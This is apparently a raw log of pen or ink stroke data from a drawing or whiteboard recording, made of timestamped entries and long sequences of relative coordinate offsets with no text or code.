0,1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2:47:02.0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095 7693,'18'0,"0"0,0 0,1 0,17 0,-18 0,36 18,-17-18,17 0,-18 0,37 0,36 0,0 0,36 18,36 0,19-18,-1 0,19 0,36 0,-36 0,36 0,-55 0,-17 0,-1 0,-36 0,19 0,-37 0,-37 18,-35-18,-1 0,-36 0,19 0,-19 0,0 0,18 0,-18 0,19 0,-1 0,0 0,19 0,-19 0,18 0,37 0,0 0,18 0,0 0,36 0,0 0,0 0,18 18,19-18,-19 0,-18 0,0 18,0-18,19 0,-37 19,-55-19,19 0,-18 18,-19-18,-36 0,18 0,-17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36.6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3 4604 0,'0'17'31,"18"-17"47,0 0-62,-1 0-1,1-17 1,0 17-16,17 0 16,18-18-16,-35 18 15,17 0-15,0 0 16,0-18-16,1 18 15,-1 0-15,0-17 16,18 17-16,0-18 16,18 1-16,17 17 15,-35 0-15,-18-18 16,18 18-16,0 0 16,0 0-16,17 0 15,1 0-15,-1 0 16,1 0-16,35 0 15,-18 0-15,0 0 16,0 0-16,-17 0 16,-18 0-16,-36 0 15,1 0-15,0 0 16,-1 0 0,19 0-1,-19 0-15,19 18 16,16-18-16,54 17 15,-35-17-15,35 18 16,-4075-1 0,8132 1-16,-4093-18 15,18 0-15,1 18 16,-19-18-16,1 0 16,-18 0-16,-36 0 15,1 0-15,0 0 78,-1 0-62,1 0 0,0 0-16,17 17 15,-18-17 1,1 0-16,0 0 15,-1 0-15,1 0 219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44.2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16 9472 0,'0'-18'63,"0"1"-48,0-1 1,17 18-16,54-17 16,0-1-16,52 18 15,36-18-15,-18 1 16,35 17-16,1 0 16,-36-18-16,0 0 15,-53 1-15,-17 17 31,-54 0-31,-17-18 47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56.5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21 2099 0,'17'-18'62,"1"18"-46,88-17-16,35-1 16,106-35-16,17 18 15,89 17-15,-18 18 16,53 0-16,-17 0 15,70 0-15,0 0 16,-71 0-16,18 0 16,194 0-1,-353 18-15,36 17 16,-18-17-16,35 35 16,36-36-16,70-17 15,88 0-15,-53 0 16,-35 0-16,53 0 15,-17 0-15,-71 0 16,229 0 0,-335 0-1,-1 18-15,1 17 0,-35 18 16,0-35-16,-36-1 16,18 1-1,-53 0-15,36-18 0,-54 17 16,-17 1-16,0-18 15,-18 0 1,-17 0-16,17 0 16,-53 0-16,18 0 15,0 0-15,0 0 16,0 0-16,17 0 16,18 18-16,1-1 15,-36-17-15,17 0 16,-17 18-16,-18-18 15,-17 0-15,0 0 16,-1 0-16,1 0 16,0 0-1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2:57.9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296 4286 0,'0'-17'31,"35"-1"-16,53 18-15,36-18 16,17 18-16,0 0 16,35 0-16,1 0 15,34 0-15,36 0 16,0 0-16,-18 18 16,36 17-16,17 1 15,-35-36 1,18 17-16,-36-17 15,53 0-15,-17 0 16,17 0-16,53 0 16,71 53-16,0 0 15,70 35-15,18 0 16,-53 18-16,-88-71 16,-36 18-16,1 0 15,52-17-15,-70 17 16,17-18-16,1 18 15,-71-36-15,-36-17 16,-34 0-16,-1 18 16,-35-18-16,-35 18 15,-18-18-15,-17 0 16,-18 17-16,0-17 16,-18 18-16,18 0 15,-35-18-15,52 17 16,-35 1-16,18-18 15,-35 0 1,0 0-16,-1 0 16,1 0 77,0 0-93,-1-18 16,-17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00.3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13 6438 0,'0'-35'94,"71"35"-78,52-18-16,18 18 15,36 0-15,17 0 16,70 0-16,-17 0 16,53 18-16,53 17 15,-89-17-15,-52 17 16,-53-35-16,-89 0 16,-34 0-16,-19 0 1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5:50.0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984 6858,'18'0,"0"0,19 0,-1 0,18 0,37 0,18 0,36 0,55 0,17 18,1 18,18-36,36 0,36 37,37-37,0 0,145 0,-19 18,-35-18,-19 36,37-18,-91 19,-109-37,18 0,-55 0,1 0,0 0,-55 0,0 0,-17 0,-19 0,0 0,0 18,-55-18,1 0,-19 0,37 0,-37 0,55 18,-73-18,37 0,0 36,17-18,-35-18,-1 0,-18 0,-17 0,-1 0,0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5:54.5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59 6251 0,'20'0'16,"0"0"77,-20-20-93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5:54.8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112 621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5:55.2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28 6211 0,'20'0'31,"0"0"16,-20 20 15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6:09.0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62 4326 0,'0'0'0,"19"0"16,21-20-16,0 0 15,-1 0-15,21 20 16,0 0-16,19 0 16,60 0-16,0 0 15,39 0-15,60 0 16,-19 0-16,59 0 15,-159 0-15,158 0 16,21 0-16,59 0 16,-39 0-16,79 0 15,-20 0-15,0 0 16,0 0-16,0 0 16,-40 0-16,-19 0 15,-21 0-15,-19 0 16,20 0-16,19 0 15,-19 0-15,-20 0 16,19 0 0,-178 0-16,159 0 0,-40 0 15,-39 0-15,19 0 16,-59 0 0,0 0-16,-60 0 15,20 0-15,-60-20 16,-19 20-16,0 0 15,-1 0-15,-19 0 16,0 0-16,0 0 16,20 0-16,-20 0 15,19 0 1,-19 0-16,0 0 16,20 0-16,-21 0 15,1 0 1,0 0-16,0 0 15,0 0-15,0 0 16,-1 0 0,1 0-1,0 0-15,0 0 16,0 20-16,0-20 16,0 0-16,-1 0 15,-19 20-15,40-20 16,-20 0-1,20 0-15,-21 0 16,1 0 0,0 0-1,0 0-15,-20 20 63,0 0-48,0 0-15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46:38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84 9287 0,'20'0'78,"59"0"-78,0 0 15,40 0-15,20 0 16,0 0-16,-40 0 16,21 0-1,-61 0-15,-19 0 16,-1 0-16,-19 0 16,20 0-16,-20-20 15,0 20 16,-1 0-15,1 0 0,0 0-1,-20 20 1,20-20 0,0 0-1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6:55.6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55 7179 0,'35'-18'78,"18"18"-63,18 0-15,-1 0 0,54 0 16,17 0 0,35 0-16,1 0 15,69 18-15,19 35 16,0-18-16,52 18 16,1-18-16,-89 1 15,0-1-15,-35 0 16,-53-17-16,-52 0 15,-54-18-15,0 0 16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7:08.6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20 14164 0,'35'-18'125,"106"1"-109,0-1-16,18 18 15,35 0-15,35 0 16,1 0 0,17 0-16,-1 0 15,-16 0-15,-36 0 16,0 0-16,-35 0 16,-36 0-16,-17 0 15,17 0-15,-17 0 16,0 0-16,0 0 15,17-18-15,-17 1 16,53-18-16,-18 17 16,-17 18-16,-36-35 15,-35 35-15,0 0 16,-36-18-16,1 18 16,17-18-16,-17 18 31,-1 0-31,1 0 15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7:25.2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58 7197 0,'0'-18'94,"18"0"-63,-1 18-15,1 0-16,17 0 15,-17 0 1,0 0 0,-1 0-1,1 0-15,0 0 31,-1 18-15,1-18 0,0 0-1,-1 0-15,1 0 16,-1 0-16,1 0 16,0 0-1,-1 0 79,1 0-63,-18 18-15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7:38.8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41 10125 0,'35'0'125,"-18"0"-125,1 0 16,0 0-16,-1 0 15,1 0-15,35 17 16,-35-17-16,-1 0 141,1 0-63,-36 0 328,1 0-25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7:47.9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199 13300 0,'18'0'250,"0"-18"-250,17 18 15,0-18-15,0 18 16,-17-17 0,0 17-16,-1 0 15,19-18 16,-19 18-15,19 0 0,-19 0 4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55:53.1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74 10051,'0'0,"18"0,-18-18,19 18,-1 0,0 0,0 0,18 0,1 0,53 0,19 0,-18 0,54 0,0 0,55 0,-37 0,37 0,-37-36,55 36,54 0,-36 0,-1 0,1 0,36 0,19 0,-19 0,-18 0,36 0,-18 18,-36-18,36 0,-18 0,-36 0,0 0,18 0,-37 0,19 0,-37 18,55 0,-73-18,19 0,-1 0,1 0,-1 0,-36 0,19 0,-37 0,18 0,-18 0,-18 0,-1 0,-17 0,18 0,0 0,0 0,-19 0,19 0,36 0,-72 0,18 0,18 0,-19 0,37-18,-36 18,18 0,18 0,-18 0,36 0,0 0,-36 0,18 0,18 0,-36 0,-37 0,37-18,-18 18,18 0,-18 0,17 0,-17 0,18 0,0 0,0 0,-19 0,19 0,0 0,18 0,18 0,-18 0,-18 0,0 0,18 0,-36 0,-1 0,19 0,18 0,-36 0,36 0,-36 0,18 0,-1 0,1 0,0 0,0 0,-18 0,18 0,-37 0,19 0,-19 0,37 0,-36 0,-1 0,-17 0,-1 0,1 0,-1 0,-18 0,37-18,0 18,-1-18,-36 18,1-19,-19 19,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6:21.8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96 7223 0,'40'0'63,"19"0"-63,61 0 15,-61 0 1,60 0-16,60 0 16,-21 0-16,61 0 15,-41 0-15,-19 0 16,20 0-16,-40 0 15,79 0-15,-20 0 16,-39-20-16,20 20 16,-21 0-16,1 0 15,0 0-15,0 0 16,-40 0-16,39 0 16,-98 0-16,119 0 15,-1 0-15,-19 0 16,0 20-16,-20-20 15,-40 0-15,-40 0 16,-39 0-16,0 0 16,0 0-1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6:25.0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77 9505 0,'0'-20'343,"20"20"-327,0 0 15,0 0 1,-20-20-1,20 20-31,-1 0 15,1 0 1,0 0 15,0 0-15,0 0 0,0 0-1,19 0 1,-19 0-1,0 0-15,0 0 16,0 0-16,0 0 16,-1 0-1,1 0-15,0 0 16,0 0 0,0 0-16,0 0 15,19 0-15,-19 0 16,20 0-1,-1 0-15,1 0 16,-20 0-16,20 0 16,19 0-16,-39 0 15,0 0-15,20 0 16,-21 0 0,1 0-16,0 0 15,0 0-15,0 0 16,0 0-16,0 0 15,-20-20 17,19 20-1,1 0-15,0 0-1,0 0 95,0 0-95,19 0 1,-19 0-1,0 0 1,0 0-16,0 0 16,0 0-1,0 0-15,-1 0 16,21 0-16,0 0 16,-1 0-16,1 0 15,-20 0-15,39 0 16,1 0-16,0 0 15,-1 0-15,1 0 16,19 0-16,-20 0 16,1 0-16,0 0 15,-1 0-15,-19 0 16,19 0-16,-19 0 16,20 0-16,-1 0 15,-19 0-15,-1 0 16,1 0-16,0 0 15,19 0-15,-19 0 16,20 0-16,-21 0 16,21 0-16,-1 0 15,-19 0-15,20 0 16,-21 0-16,41 0 16,-61 0-16,41 0 15,-1 0 1,1 0-16,19 0 15,1 0-15,-41 0 16,21 0-16,19 0 16,-19 0-16,19 0 15,-19 0-15,-1 0 16,1 0-16,-1 0 16,21 0-16,-21 0 15,21 0-15,-41 0 16,1 0-16,20 0 15,-21 0-15,1 0 16,0 0-16,-1 0 16,1 0-16,0 0 15,19 0-15,-19 0 16,0 0-16,-1 0 16,1 0-16,0 0 15,-20 0-15,-1 0 31,1 0 32,0 0 15,0 0-62,0 0-1,0 0-15,-1 0 16,21 0-16,-20 0 16,20 0-1,19 0-15,-19 0 0,19 0 16,1 0-16,-20 0 15,-1 0-15,1 0 16,0 0-16,-20 0 16,19 0-16,-19 0 15,0 0-15,0 0 16,0 0 171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6:27.5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57 11588 0,'20'0'93,"20"0"-77,0 0-16,59 0 16,0 0-16,60 0 15,39 0-15,1 0 16,19 0-16,20 0 15,40 0-15,79 0 16,-20 0-16,100 0 16,-278 0-16,317 0 15,60 0-15,-159 0 16,-80 0-16,-78 0 16,-61 0-16,-78 0 15,-40 0-15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01.4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16 7038 0,'18'0'47,"17"0"-31,18 0-16,0 0 15,0 0 1,0 0-16,35 0 0,36 0 16,-1 0-1,18 0-15,0 0 0,18 0 16,300 18 0,-336-1-1,-35-17 1,-35 18-16,0-18 15,-35 0-15,-1 0 16,1 0-16,0 0 31,-1 0 110,1 17-63,0-17-62,-1 36-1,19-36 1,17 0 0,52 0-16,19 0 15,-1 0-15,1 0 16,-36 0-16,35 0 15,-52 0-15,-36 0 16,1 0-16,-19 0 16,1 17 93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13.4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97 7056 0,'17'0'32,"1"0"-32,0 0 15,-1 0 1,19 0-1,-1 0-15,0 0 16,0 0-16,18 17 16,0 1-1,-17-18-15,-1 0 16,-17 0-16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15.2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13 7179 0,'18'0'47,"-1"0"-32,1-18-15,0 18 16,-1 0-16,19 0 15,16 0-15,37 0 16,-19 0-16,18 0 16,36 0-1,-1 36-15,1-19 0,17 1 16,0 0-16,-35-18 16,-18 17-16,36-17 15,-72 0 1,-34 0-16,0 0 15,-1 0-15,1 0 16,0 0 0,-1 0-1,1 0-15,17 0 32,0 0-17,-17 0-15,35 0 16,-18 0-16,18 0 15,0 0-15,18 0 16,17 0-16,35 0 16,1 0-16,-36 0 15,0 0-15,0 0 16,-35 0 0,-35 0-16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18.0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247 7179 0,'17'0'15,"36"0"1,18-18-16,35 1 16,17-1-16,-17 0 15,53 1 1,17 17-16,18 0 0,-35 0 16,-18 0-16,-17 0 15,-36 0 1,0 0-16,-35 0 0,-36 0 15,1 0 282,0 0-265,-1 17 14,1-17-30,35 0-16,35 0 16,36 0-16,17 0 15,-35 0-15,17 0 16,1 0-16,-1 0 16,-17 0-16,17 0 15,18 0-15,-17 0 16,-36 0-16,18 0 15,-36 0-15,-17 0 16,-17 0-16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19.0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344 7161 0,'18'0'31,"0"0"-15,35 0-16,0 0 15,35 36-15,53-19 16,0 1-16,18 17 15,-18-35-15,-35 0 16,17 0-16,-17 18 16,-35-18-16,-1 0 15,18 17-15,-70-17 63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20.0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13 7285 0,'36'0'31,"-1"0"-31,18 17 16,18-17-16,-1 0 16,18 0-16,0 0 15,18 0-15,18 0 16,-18 0-16,52 53 16,-17-35-16,36 0 15,-36-18-15,18 17 16,-53-17-16,-36 0 15,-35 0-15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28.1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8767 0,'18'0'32,"-1"0"-32,36 0 0,-18 0 15,36 0 1,0 0-16,52 0 16,1 0-16,34 0 15,1 0-15,-18 0 16,-35 17-16,-35 1 15,-19-18-15,-34 0 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2:53.7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82 4372,'0'0,"36"0,0 0,1 0,-1 0,55 0,-19 0,37 0,0 0,18 0,0 0,54 19,1-19,35 18,19 18,-36-18,36 18,54-36,-72 0,-1 0,-17 19,0-19,-37 0,-18 18,0 0,-72-18,54 18,-18 18,-19-36,1 18,-55-18,19 19,-37-19,0 18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30.9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26 8767 0,'0'-18'63,"18"18"-48,-1 0-15,36 0 16,18 0-16,-1 0 16,54 0-1,17 0-15,0 0 0,0 0 16,0 0-16,0 0 15,-35 0 1,0 0-16,0 0 0,-36 0 16,-34 0-1,-19 0-15,1 0 16,0 0 0,-1 0 15,1 0 0,0 0-31,-1 0 16,-17-18-1,18 18 1,0 0 15,17 0-15,-18 0-16,1 0 15,17 0-15,1 0 16,17 0-16,-18 0 16,18 0-16,0 0 15,-18 0-15,0 0 16,-17 0-16,17 0 16,-17 0-1,17 0 16,-17 0-15,-1 0 47,1 0-17,0 0-30,-1 0 0,1 0-16,17 0 15,-17 0-15,-1 0 16,1 0 31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32.8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217 8696 0,'18'0'63,"-1"0"-47,19 0-16,16 0 0,-16 0 15,34 0-15,1 0 16,35 0-16,-18 0 15,18 0-15,35 0 16,-35 0 0,17 0-16,1 0 15,-1 0-15,-17 0 16,35 0-16,0 0 16,35 0-16,-34 0 15,-1 0-15,-35 0 16,17 0-16,18 0 15,-35 0-15,-18 0 16,36 0-16,-36 0 16,-18 0-16,54 0 15,-36 0-15,18 0 16,17 0-16,-17 0 16,18 0-16,-19 0 15,-16 0-15,-1 0 16,-18 0-16,19 0 15,-19 0-15,18 0 16,1 18-16,16-1 16,19 1-16,-1 0 15,1-1-15,-1 1 16,1-18-16,-1 35 16,1-17-1,-18-18-15,17 17 0,-17-17 16,-18 18-16,-17-18 15,34 0 1,-52 0-16,0 0 16,0 0-16,-18 0 15,-17 0-15,0 0 11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42.8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22 10319 0,'18'0'188,"35"0"-173,-36 0-15,1 0 16,0 0 0,-1 0 15,1 0 63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43.9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86 10231 0,'0'-18'47,"18"18"-32,0 0-15,17 0 16,-17 0-16,-4075 0 16,8149 0-1,-4057 0-15,-17 0 16,-1 0-16,19 18 15,-1-18-15,0 0 16,1 0-16,16 0 16,-16 0-16,17 0 15,-36 0-15,36 0 16,-35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45.2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45 10283 0,'-18'-17'78,"-35"17"-62,-35 0-16,-36-18 15,54 1-15,-1 17 16,18-18-16,18 18 15,0 0-15,17-18 63,53 18 62,-17 0-109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46.2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91 10195 0,'18'0'172,"17"0"-172,18 0 16,-17 0-1,-1 0-15,0 0 16,0 0-16,1 0 16,-1 0-16,-17 0 31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47.0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50 10248 0,'18'18'63,"-1"-18"-63,1 0 15,-1 0-15,1 0 16,0 0-16,-1 0 16,1 0-16,17 0 15,1 17 1,-19-17-1,1 0-15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0.2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66 10160 0,'18'0'47,"-1"0"-32,36 0-15,0 0 16,0 0-16,0 0 16,0 0-16,0 0 15,0 0-15,0 0 16,17 18-16,-17-18 16,0 0-16,0 17 15,0-17-15,0 18 16,0-18-16,35 0 15,-18 0-15,36 0 16,-18 18-16,36-18 16,17 0-16,0 17 15,0 1-15,18-1 16,-18 1-16,-53-18 16,18 0-16,-53 0 15,0 0-15,-35 0 16,17 0-16,-18 0 15,1 0-15,17 0 16,-17 0 0,0 0-1,-1 0-15,19 0 16,-19 0 0,1 0 30,0 0-46,17 0 16,18 18-16,35-1 16,35 1-16,-34-18 15,34 18-15,-17-18 16,-36 0-16,-34 0 16,-19 0-16,19 0 15,-19 0-15,1 0 16,-18-18 31,18 18-32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2.6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175 10213 0,'0'0'0,"17"0"110,1 0-95,17 0-15,18-18 16,36 1-16,-19 17 16,89 0-16,17 0 15,1 0-15,34 0 16,1 0-16,158 0 31,-229 0-31,-17 0 0,-1 0 16,-52 0-16,-18 0 15,-18 0-15,-17 0 16,-1 0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3.8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184 10372 0,'0'-18'0,"18"18"31,35-18-31,-18 18 0,0-17 16,18 17-16,0 0 16,18 0-1,17 0-15,18 0 0,-18-18 16,36 0-16,-19 1 15,-52 17 1,18-18-16,-18 18 16,0-17-16,-18 17 15,0 0-15,-17-18 16,-1 18-16,1 0 16,0 0-1,-1 0 1,1 0-16,0 0 15,17 0 1,-17 0 0,17 0-1,-18 0 1,1 0 0,0 0-1,-1 0-15,1 0 16,0 0-1,-1 0 17,1 0-17,0 0 1,35 0-16,-18 18 16,18-18-1,17 17-15,-17 1 16,0-18-16,-18 0 15,18 0-15,0 0 16,-17 0-16,-19 0 16,1 0-1,-53 0 11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2:55.3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812 4409,'18'18,"19"-18,17 0,37 0,72 0,18 0,37 0,18 0,18 18,73-18,72 0,145 0,-54 0,-91 0,-109 0,-72 18,-18-18,-1 73,-72-55,-54 0,-37-18,-18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4.5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186 10283 0,'0'0'15,"70"0"-15,36 0 16,-18 0-16,18 0 0,35 0 16,-35 0-1,0 0-15,-18 0 16,-17 0-16,-18 0 16,-18 0-16,-18 0 15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6.6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39 11624 0,'0'0'0,"18"-18"15,52-17-15,-35 35 16,18-18-16,0 1 15,0-1-15,-18 1 16,18 17-16,0 0 16,0 0-16,0-18 15,0 18-15,-18 0 16,18 0 0,0 0-16,0 0 0,35 0 15,0 0-15,54 0 16,52 0-16,35 0 15,-35 0 1,35 0-16,-70 0 0,35 0 16,-35 35-1,-18-35-15,18 0 16,-18 0-16,-35 18 16,17-18-16,-17 0 0,-53 0 15,17 0 1,-17 0-16,-18 0 15,1 0-15,-19 0 0,1 0 16,0 17 125,17-17-126,18 0 1,-18 0-16,18 0 16,0 0-16,-18 0 15,18 0-15,-18 0 16,1 0-16,-1 0 15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8:57.8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3 11518 0,'18'0'78,"17"0"-62,36 0-1,70 0-15,35 0 16,18 0-16,18 0 16,0 0-16,-36 0 15,-35 0-15,-18 0 16,-70 0-16,0 18 16,-35-18-16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9:00.0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610 11642 0,'794'-18'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9:00.8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665 11536 0,'0'-18'47,"0"1"-47,0-19 15,17 36-15,19-17 16,17-1-16,-1 18 16,1 0-16,0 0 15,-17 0-15,17 0 16,-18 0-16,-18 0 16,1 0-16,0 0 15,-1 0-15,1 0 16,0 0 31,-1 0-32,1 0 32,17-18-47,0 1 16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9:01.8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311 11589 0,'17'0'62,"1"0"-46,17 0 0,18 0-1,0 0-15,18 0 16,-1 0-16,36 0 15,-36 0-15,19 0 16,-19 0-16,18 0 16,-17 0-16,-1 0 15,1 0-15,17 0 16,18 0-16,-18 0 16,18 0-16,-35 0 15,-18 0-15,0 0 16,-36 0-1,1 0-15,-1 0 16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19:03.4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662 11624 0,'18'0'15,"-1"0"1,1 0 0,-1 0-16,19 0 15,-1 0-15,0 0 16,18 0-16,53-18 31,-35 1-31,-18-1 16,17 18-16,1 0 15,-18 0-15,-18 0 16,53-18-16,-53 18 16,18 0-16,-17-17 15,-19 17-15,18-18 16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13.9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52 12718 0,'35'0'78,"18"0"-63,0 0-15,17 0 16,1 0-16,-1 0 16,-17 0-16,0 0 15,-17 0-15,16 0 16,-16 0-16,17 0 15,-18 0-15,18 0 16,0 0-16,0 0 16,0 0-16,35 0 15,0 0-15,0 0 16,18 0-16,18 0 16,-36 0-16,35 0 15,-17 0 1,17 0-16,19 0 0,-1 0 15,0 0-15,53 0 16,18-36 0,17 19-16,35-1 0,36 0 15,35 18 1,18-17-16,-18 17 16,-52 0-16,69 0 15,-69 0-15,-19 0 16,18 0-16,-52 0 15,17 0-15,-36 0 16,248 0 0,-283 0-16,-17 0 15,35 0-15,-35 0 16,17 0-16,-17 17 16,35 19-16,-18-1 15,-17 18-15,-35-18 16,-36-17-16,-35-1 15,0 1 1,-36-18 25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15.1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95 12982 0,'-18'-17'16,"89"17"0,34 0-1,36 0-15,36 0 16,70 0-16,0 0 15,17 0-15,19 0 16,-37 0-16,1 0 16,-53 0-16,-17 0 15,-36 0-15,0 0 16,-17 0 0,-19 0-16,19-36 15,52 1-15,1-18 16,-19 18-16,195-53 15,-176 52 1,-19 19-16,36-1 16,-17-17-16,-36 35 15,0 0-15,-53 0 16,-17 0-16,-18 0 16,-18 0-16,0 0 15,0 0-15,-17 0 16,17 0-16,18 0 15,0 0-15,-35 0 16,-1 0-16,19 0 16,-19 0-16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16.6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46 14076 0,'0'17'31,"88"36"-15,18-17-16,70 17 15,-17-18-15,35-17 16,18 17-16,35-18 15,35 19-15,88 34 16,-105-52-16,70 17 16,18 18-16,158 35 15,-52-35-15,88 35 16,17 1-16,36-1 16,0 0-1,-1-17-15,-16-54 0,-54-17 16,-53 0-16,0 0 15,-211 0 1,-54 0-16,-52 0 0,-18 0 16,-52 0-1,-37 0-15,1 0 16,-35 0-16,0 0 16,17 0 77,-17 0-93,17 0 16,0 0-16,0-35 16,1 35-16,-1-18 15,0 1-15,0-1 16,18 0-16,0 1 15,53-19-15,0-17 16,17 36-16,1-18 16,35-1-16,35 1 15,17 0-15,36 17 16,-17-35-16,-36 36 16,-36-1-16,-69 0 15,-36 1-15,-36-1 16,1 0-1,-1 18-15,1-17 16,0 17-16,-1-18 16,1 0-16,0 18 15,17-17 1,-17-1-16,34 1 31,-16-19-31,-19 19 16,19-1-16,-19 0 15,1 1 17,0 17-17,-1-18 17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2:56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57 5806,'18'0,"0"0,37 0,-1 0,1 0,17 0,19 0,-19-18,-17-1,-37 1,18 0,19 18,-37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18.7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87 3281 0,'0'53'15,"-17"17"-15,-19 18 16,-16 18-16,16-35 15,-52 35-15,-53 17 16,-18 1-16,-88 17 16,-35 35-16,-53 1 15,17-19-15,124-34 16,71-54-16,35 1 16,123-36-1,71-17 1,53 17-16,35-17 15,53 17 1,-18 0-16,0 18 0,18-18 16,-35 18-16,-18 0 15,-53 0-15,0-35 16,-70-18-16,-19 0 16,-16-18-16,-19 1 15,-17-36-15,0-36 16,0-87-1,0 88-15,-17-36 16,-36-17-16,0-35 16,-35-36-16,-36 1 15,18 52-15,-17 0 16,-1 18-16,19 17 16,16 19-16,1-1 15,35 18-15,0 35 16,18-18-16,17 54 15,-34 34 1,-19 89 0,0 17-16,1 36 15,-54 141 1,107-212-16,-1 36 16,18-1-16,-17 36 15,17 17-15,0-17 16,0-18-16,0 0 15,0 0-15,35-35 16,18 0-16,17 18 16,54 17-1,-89-88 1,18-36-16,17 1 0,-17-18 16,36 0-16,34-18 15,1-35 1,17-17-16,-35-18 15,-18-1-15,18-16 16,-36 16-16,-17 1 16,-18-35-16,-17 17 15,-18-35-15,35 0 16,0-18-16,-35-17 16,0-1-16,0 1 15,0-1-15,0 1 16,0 70-16,18 0 15,0 18-15,-18 0 16,17 53 0,-17 17-16,18-35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3:29.3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75 1023 0,'-35'0'62,"-89"18"-62,-70 70 16,-106 35-16,-53 36 16,-52 0-16,-142 123 15,0-35-15,89-53 16,122 0-16,107-70 16,53-1-16,87-35 15,37 71 1,52-71-1,35 18-15,71 70 0,88-17 16,88 35-16,141-17 16,759 334-1,-688-317 1,-88-35-16,-106-36 16,-106-87-16,-71-1 15,-70-35-15,-35 0 16,17-18-1,0-70-15,0-53 16,1-35-16,-36-1 16,0-34-16,0-54 15,-124-53-15,-17-34 16,-35 34-16,-36-17 16,18 35-16,-35-35 15,-54 18-15,72 70 16,34 0-16,36 53 15,71 52-15,35 72 16,-1-1-16,36 54 16,0 34 31,0 107-47,0 70 15,0 35-15,0 89 16,0 70-16,0 141 15,-70-53-15,17-35 16,17 0-16,36-141 16,0-18-16,0-17 15,0-18-15,0-71 16,36-52 0,-1-89-16,0 18 15,1-18-15,-19-17 16,1-18-16,0 0 15,-1 0-15,18 17 16,1-17-16,-1 0 16,-17 0-16,17 0 15,0 0-15,18 0 16,0 0-16,18-17 16,-1-19-16,71-87 15,-17 17-15,-1-53 16,1-35-16,-54 0 15,-17-17-15,18-36 16,-1 0-16,1-71 16,52-423-1,-52 424-15,-1-18 16,-34 105-16,-1 107 16,18-71-16,-18 18 15,-17 105-15,-18 18 16,0 35-1,17 18 79,19 0-78,17 18-16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7:31.7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013 4405 0,'40'0'0,"0"0"15,-1 0 1,1 0-16,39 0 16,40 0-16,40 0 15,20 0-15,39 0 16,20 0-16,40 0 16,20 0-16,-20 0 15,-40 0-15,-20 0 16,-159 0-16,60 0 15,-39 0-15,-40 0 16,-21 0-16,1 0 47,0 0-31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7:33.8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91 4544 0,'20'0'0,"0"0"16,19 0-1,1 0 1,79 0-16,40 0 16,0 0-16,19 0 15,40 0-15,-19 0 16,19 0-16,-19 0 15,19 0-15,-59 0 16,-20 0-16,-60 0 16,-59 0-16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7:34.4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427 4465 0,'0'-20'15,"20"20"-15,0 0 16,39-20-16,40 20 16,60 0-16,59 0 15,21 0 1,-160 0-16,179 0 15,-40 0-15,-59 0 16,20 0-16,-1 0 16,-98 0-16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7:48.5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11 6905 0,'20'0'47,"0"20"-31,0-20-1,19 20-15,1-20 16,-20 20-16,0-20 16,19 0-16,1 20 15,0 0-15,-20-20 16,39 0-16,1 0 16,-1 0-1,-19 0-15,19 0 16,1 0-16,19 0 15,21 0-15,-81 0 16,41 0-16,-1 0 16,1 0-16,-20 0 15,-21 0-15,1 0 16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7:49.3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92 7620 0,'20'0'125,"0"0"-109,0 0 0,-1 0-1,21 0 1,20 0-16,19 0 15,40 0-15,0 0 16,20 0-16,59 0 16,-39 0-16,20 0 15,-20 0-15,19 0 16,-19 0-16,-20 0 16,-40 0-16,-39 0 15,-60-20 157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8:00.9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02 11410 0,'20'0'94,"0"0"-94,-1 0 16,1 0-1,0 0 1,0 0-16,0 0 15,0 0-15,-1 0 16,21 0-16,-20 0 16,20 0-1,-20 0-15,-1 0 16,21 0-16,-20 0 16,0 0-16,0 0 15,-1 0 1,1 0-1,0 0-15,0 0 16,0 0 15,0 0 16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8:07.7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46 11231 0,'20'0'78,"0"0"-62,19 0-16,21 0 16,-1 0-16,1 0 15,19 0-15,-39 0 16,19 0-16,-19 0 16,-20 0-16,0 0 15,0 0-15,-20 20 219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8:29.8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399 11192 0,'20'0'94,"0"0"-78,40 19-16,-21 1 15,41 0-15,-1 0 16,60-20-16,0 0 16,-20 0-16,40 0 15,-1 0-15,1 0 16,-20 0-16,-20 0 15,-59 0-15,39 0 16,0 0-16,-39 0 16,19 0-16,0 0 15,-39 0 1,59 20-16,0-20 16,-19 20-16,39 0 15,0-1-15,-40-19 16,-19 0-16,-20 0 15,-21 0 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2:58.7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555 7239,'0'0,"36"-18,19 18,17 0,1 0,-19 0,19 0,54 0,-36 0,36 0,0 0,18 0,-18 0,18 36,-36-36,72 0,-36 0,37 0,35 0,-35 0,54 0,-19 0,19 0,0 0,18 0,36 0,-54 0,-18 0,18 0,-18 0,-1 0,19-18,-18 18,0 0,17 0,19 0,-36 0,18 0,-55 0,73 0,-18 0,-72 0,53 36,1-36,-18 0,17 0,19 18,-36 1,-19-19,1 0,-74 0,1 0,-18 0,-55 0,-18 0,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8:32.1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12442 0,'20'0'16,"19"0"0,1 0-1,20 20-15,19-1 16,-39-19-16,118 0 16,1 0-16,20 20 15,59 20-15,0 0 16,0-20-16,40-20 15,-60 0-15,20 0 16,-19 0-16,-1 0 16,-159 0-16,100 0 15,0 0-15,0 0 16,-21 0-16,-18 0 16,-21 0-16,0 0 15,-20 0-15,1 0 16,-1 0-16,20 19 15,-39-19-15,19 0 16,1 0-16,-1 0 16,-19 0-16,39 0 15,-40 0-15,-19 0 16,19 0-16,-19 0 16,-20 0-1,0 0-15,20 0 0,-1 0 16,1 0-1,0 0 1,-21 0-16,1 0 16,20 0-16,-20 0 15,0 0 1,0 0 0,-1 0-1,1 0 1,0 0-16,0 0 15,20 0-15,-1 0 16,-19 0 0,0 0-1,0 0 17,0 0-17,39 0-15,40 0 16,20 0-16,-19 0 15,-21 0-15,20 0 16,-19 0-16,-21 0 16,-39 0-16,20 0 15,-20 0-15,-1 0 16,21 0 0,0 0-1,-20 0-15,19 0 16,1 0-16,0 0 15,-1 0-15,21 0 16,-1 0-16,-19 0 16,0 0-16,0 0 15,-21 0-15,1 0 16,0 0 0,0 0-16,0 0 15,0 0 16,-1 0 1,1 0-32,0 0 31,0 0-15,0 0-16,0 0 15,-1 0 16,1 0 1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3:28:33.7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117 12601 0,'39'0'78,"41"0"-62,19 0-16,-39 0 15,39 0-15,20 0 16,20 0-16,19 0 15,21 0-15,-20 0 16,0 0-16,39 0 16,-19 0-16,-1 0 15,40 0-15,-59 0 16,0 0-16,-60 0 16,0 0-16,-39 0 15,-40 0 1,0 0-16,-1 0 78,1 0-31,-20 19 62,20-19-31,0 0-62,0 0-16,20 0 16,19 0-16,1 0 15,-21 0-15,-19 0 16,0 0-16,0 0 15,0 0 32,-20 20 47,-20-20-94,20 20 16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47:20.9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27 13910 0,'20'0'47,"-1"0"-32,21 0 1,0 0 0,-1 0-16,1 0 15,-20 0-15,20 0 16,-20 0-16,-1 0 